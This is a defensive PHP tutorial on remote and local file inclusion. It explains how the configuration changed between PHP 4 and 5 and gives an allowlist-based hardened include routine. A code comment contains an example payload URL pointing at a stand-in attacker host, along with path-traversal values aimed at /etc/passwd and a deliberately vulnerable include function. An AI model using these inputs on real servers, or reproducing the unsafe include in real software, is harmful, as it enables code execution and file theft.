Security is a big topic for web developers, who quickly get a reputation as careless programmers if clients complain that their websites have been hacked in one form or another. With the release of PHP 5, developers are urged to move to the more secure platform rather than staying on PHP 4. One example of the improved security is the way files are included into an application.
The attack at issue is often mislabelled as cross-site scripting (XSS); more precisely it is remote file inclusion (RFI): an attacker supplies a URL to a file on a server he or she controls, the application passes it to include() or require(), and the attacker's PHP code runs on the victim's server. This attack is prevalent on PHP 4 platforms but much less so on PHP 5 because of a change in the default configuration. PHP 4 lets include() fetch any URL; PHP 5 has cracked down on URL includes and instead pushes developers toward other ways of locating the files to include. Note that what is blocked is the URL form (http://..., ftp://...), not ordinary absolute filesystem paths such as /var/www/site/inc/header.php, which still work.
One popular use of a server compromised through remote file inclusion is as a proxy for illegal activity. A careful attacker will not be caught and can send spam or mount attacks against other websites and servers from the compromised machine. Because the traffic appears to come from the webmaster's server, the attacker may never be traced, while the webmaster is left exposed to personal liability.
The configuration directive usually referenced here is "allow_url_fopen," which controls whether PHP's file functions (and, before PHP 5.2, include() and require()) may open URLs. Strictly speaking, allow_url_fopen defaults to On in both PHP 4 and PHP 5; what changed is that PHP 5.2 introduced a separate directive, "allow_url_include," which governs URL includes specifically and defaults to Off. The practical effect on a default PHP 5.2 or later installation is that include 'http://...' is refused with the error "URL file-access is disabled in the server configuration," so there is more emphasis on using local paths, relative or absolute. Don't fret: local paths are just as easy to use and far more secure.
Another way to write include statements in PHP 5 is to build the path from the server's own document root, so the familiar "full path" syntax can still be used. The server variable for this directory, $_SERVER['DOCUMENT_ROOT'] (the array name and key are case-sensitive), takes the place of the webmaster's domain name when including a file: include 'http://www.example.com/inc/header.php' becomes include $_SERVER['DOCUMENT_ROOT'] . '/inc/header.php'. This is an absolute filesystem path, so it is unaffected by the URL restriction, and it avoids rewriting every include to use relative paths. It is also the correct behaviour: including a file over HTTP, even from your own domain, fetches the script's rendered output rather than its PHP source, so the URL form never did what most webmasters assumed.
It is recommended that "allow_url_include" be kept off, and "allow_url_fopen" as well unless the application genuinely needs to read remote files, even though either can easily be switched on in php.ini by anyone with access to the server configuration. If for some reason a setting cannot be kept off, the focus must shift to the application code: never pass user-supplied input (query parameters, cookies, form fields, or values read back from a database) into include(), require(), or fopen(). Restrict includable files to a fixed allowlist and verify that the resolved path stays inside the intended directory; this also closes the related local file inclusion hole (?page=../../etc/passwd) that URL restrictions alone do not address.
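The following is an added example, not code from the original article, showing the unsafe include pattern next to a hardened version that resolves pages against $_SERVER['DOCUMENT_ROOT'] and an allowlist, and checks the relevant ini directives at startup. The function names, the templates/ directory and the page names are hypothetical; the code is written to run on PHP 5.3 or later.

```php
<?php
// Added example (hypothetical names, not from the original article).
// Contrasts an include() driven by user input with a hardened version
// that uses $_SERVER['DOCUMENT_ROOT'] plus an allowlist and a realpath check.

// VULNERABLE: ?page=http://attacker.example/shell.txt runs attacker code when
// URL includes are enabled (PHP < 5.2 with allow_url_fopen=On, or PHP >= 5.2
// with allow_url_include=On). Even with URL includes disabled,
// ?page=../../../../etc/passwd still discloses local files.
function includePageUnsafe($page)
{
    include $page . '.php';
}

// Pages the router is permitted to serve (hypothetical allowlist).
function allowedPages()
{
    return array('home', 'about', 'contact');
}

// Resolve a page name to an absolute filesystem path under
// DOCUMENT_ROOT/templates, or return null if it is not permitted.
function resolvePage($page, $docRoot)
{
    if (!in_array($page, allowedPages(), true)) {
        return null; // not on the allowlist: reject before touching the filesystem
    }
    $templateDir = realpath($docRoot . '/templates');
    if ($templateDir === false) {
        return null; // template directory missing or unreadable
    }
    $candidate = realpath($templateDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($candidate === false) {
        return null; // file does not exist
    }
    // Defence in depth: the canonical path must stay inside the template dir.
    $prefix = $templateDir . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// HARDENED: the value passed to include() is always an absolute local path
// chosen from a fixed set, so neither a URL nor a traversal sequence survives.
function includePageSafe($page)
{
    $path = resolvePage($page, $_SERVER['DOCUMENT_ROOT']);
    if ($path === null) {
        header('HTTP/1.1 404 Not Found');
        return false;
    }
    include $path;
    return true;
}

// Startup check: true when include()/require() cannot load URLs.
// allow_url_include exists only from PHP 5.2; on older builds the check
// falls back to allow_url_fopen, which governed includes there.
function remoteIncludesDisabled()
{
    $directive = (ini_get('allow_url_include') === false) ? 'allow_url_fopen' : 'allow_url_include';
    return !filter_var(ini_get($directive), FILTER_VALIDATE_BOOLEAN);
}

if (!remoteIncludesDisabled()) {
    error_log('warning: URL includes are enabled; set allow_url_include=Off in php.ini');
}

$page = isset($_GET['page']) ? (string) $_GET['page'] : 'home';
includePageSafe($page);
```

The allowlist is the real control here; realpath() and the prefix comparison are a second layer in case the list is later replaced by a looser check. Note that ini_set() cannot turn allow_url_include on or off at runtime, so the startup check can only warn; the directive must be fixed in php.ini or the server configuration.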
In Conclusion
PHP 5 has brought us many new security features, and refusing URL includes by default is an example of where the industry is going. For more information on the syntax, how to use it, and web development in general, readers should consult the PHP manual or obtain a PHP 5 book from a local bookstore.